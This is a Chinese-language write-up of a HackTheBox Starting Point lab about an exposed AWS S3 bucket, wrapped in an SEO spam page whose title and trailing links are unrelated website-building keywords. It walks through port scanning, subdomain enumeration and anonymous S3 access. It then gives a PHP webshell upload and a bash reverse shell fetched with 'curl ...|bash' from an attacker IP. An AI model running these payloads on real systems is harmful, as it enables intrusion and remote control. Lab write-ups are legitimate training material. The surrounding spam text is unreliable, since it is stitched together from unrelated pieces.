当前位置: 首页 > news >正文

漳州手机网站开发一流的扬中网站建设

漳州手机网站开发,一流的扬中网站建设,马鞍山网站建设制作,app制作公司上海文章目录 一 题目二 实验过程 一 题目 Tags Web、Cloud、Custom Applications、AWS、AWS、Reconnaissance、Web Site Structure Discovery、Bucket Enumeration、Arbitrary File Upload、Anonymous/Guest Access译文:Web、云、定制应用程序、AWS、AWS、侦察、网站…

文章目录

    • 一 题目
    • 二 实验过程


一 题目

Tags

Web、Cloud、Custom Applications、AWS、AWS、Reconnaissance、Web Site Structure Discovery、Bucket Enumeration、Arbitrary File Upload、Anonymous/Guest Access译文:Web、云、定制应用程序、AWS、AWS、侦察、网站结构发现、桶枚举、任意文件上传、匿名/访客访问

Connect

To attack the target machine, you must be on the same network.Connect to the Starting Point VPN using one of the following options.
It may take a minute for HTB to recognize your connection.If you don't see an update after 2-3 minutes, refresh the page.译文:要攻击目标机器,您必须位于同一网络上。使用以下选项之一连接到起点 VPN。
HTB 可能需要一分钟才能识别您的连接。如果 2-3 分钟后没有看到更新,请刷新页面。

SPAWN MACHINE

Spawn the target machine and the IP will show here.译文:生成目标机器,IP 将显示在此处

TASK 1

How many TCP ports are open?译文:打开了多少个 TCP 端口?答:2

TASK 2

What is the domain of the email address provided in the "Contact" section of the website?译文:网站"Contact" 部分中提供的电子邮件地址的域名是什么?答:thetoppers.htb

TASK 3

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?译文:在没有 DNS 服务器的情况下,我们可以使用哪个 Linux 文件将主机名解析为 IP 地址,以便能够访问指向这些主机名的网站?答:/etc/hosts

TASK 4

Which sub-domain is discovered during further enumeration?译文:进一步枚举时发现了哪个子域?答:s3.thetoppers.htb

TASK 5

Which service is running on the discovered sub-domain?译文:哪个服务正在发现的子域上运行?答:Amazon S3

TASK 6

Which command line utility can be used to interact with the service running on the discovered sub-domain?译文:哪个命令行实用程序可用于与在发现的子域上运行的服务进行交互?答:awscli

TASK 7

Which command is used to set up the AWS CLI installation?译文:使用哪个命令来设置 AWS CLI 安装?答:aws configure

TASK 8

What is the command used by the above utility to list all of the S3 buckets?译文:上述实用程序使用什么命令来列出所有 S3 存储桶?答:aws s3 ls

TASK 9

This server is configured to run files written in what web scripting language?译文:该服务器配置为运行用哪种 Web 脚本语言编写的文件?答:php

SUBMIT FLAG

Submit root flag译文:提交根标志

二 实验过程

1.端口扫描

nmap -sV -sC 10.129.251.57

在这里插入图片描述

2.访问web站点,发现地址邮件域名地址 thetoppers.htb

在这里插入图片描述

3.在host文件中绑定域名 thetoppers.htb

在这里插入图片描述

4.对主域 thetoppers.htb 进行子域名扫描

5.在host中绑定发现的子域名 s3.thetoppers.htb

在这里插入图片描述
6.访问s3.thetoppers.htb子域名发现

在这里插入图片描述

S3存储桶: S3 是一种对象存储服务,它将数据作为对象存储在存储桶中。对象是一个文件和描述该文件的任何元数据。桶是存放对象的容器,存储在 Amazon S3存储桶中的文件被称为S3对象 。 它允许我们将东西存储在称为桶的容器中 。 AWS S3存储桶有各种用例,包括备份和存储,媒体托管,软件交付,静态网站等。

7.使用aws客户端程序与S3存储桶交互

#列出服务器上托管的所有S3存储桶
aws --endpoint=http://s3.thetoppers.htb/ s3 ls
#列出指定存储桶下的对象和常用前缀,发现如下目录,为web网站的根目录
aws --endpoint=http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb

在这里插入图片描述

8.上传webshell

# 在当前目录下创建shell.php
echo '<?php system($_GET['cmd']);?>' >shell.php#将shell点php上传到thetoppers.htb下
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

在这里插入图片描述

9.访问shell.php并执行命令
在这里插入图片描述

10.反弹shell

#开启http服务器
python3 -m http.server 8000

在这里插入图片描述

# 在当前开启的web服务器目录上创建shell.sh文件,内容如下
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.11/1234 0>& 1
# 开启监听
ncat -lnvp 1234
# 利用curl从本地web服务器获取shell.sh,并通过管道传递给bash执行,获取到反弹shell
http://thetoppers.htb/shell.php?cmd=curl%2010.10.14.11:8000/shell.sh|bash

在这里插入图片描述

11.查找flag

在这里插入图片描述

http://www.yayakq.cn/news/374702/

相关文章:

  • app软件定制企业wordpress优化版源码
  • 电商网站的建设案例汕头网站制作公司价格
  • 网站开发人员考核指标都江堰市网站建设
  • 山东移动网站建设深圳网站建设q.479185700惠
  • 龙口网站开发中国万网域名注册价格
  • 网站可以不备案百度地图的精准定位功能
  • 域名连接到网站怎么做视频教学网站开发需求分析
  • 手机网站和微网站网站小功能
  • 织梦网站安装出现dir任何查询网站有没有做404
  • node做网站codewars网站
  • 马克杯在线设计网站网页制作属于哪个专业
  • 阿里云网站建设一次付费苏州网站制作推广
  • 网站建设需求确认表网页制作指南
  • 网站建设尾款结算申请中国机械设计网
  • 湛江市建网站烟台网站建设哪家好
  • 商丘网站seowordpress4.6 中文
  • 做网站一屏的尺寸是wordpress 下一篇插件
  • 响水网站建设服务商网站建设的岗位名称
  • id97网站怎么做的彩票网站开发注意事情
  • html中文网站作业wordpress 字体定义
  • 冠县哪做网站如何建设网站的目录结构层
  • 网站服务器如何维护上海外贸服装
  • 网站类网站开发做网站设计管理需要什么知识
  • 建站网站怎么上传代码网站的推广方法
  • 爱站工具下载电商运营必备技能
  • 河津做网站博瑞微传媒建站快车
  • 做一个简单的网站多少钱浙江省建设注册管理中心网站
  • 丰镇市网站国外html5做网站
  • wordpress建站详解明星网站策划书
  • 阿里巴巴与慧聪网网站建设对比互联网装修公司品牌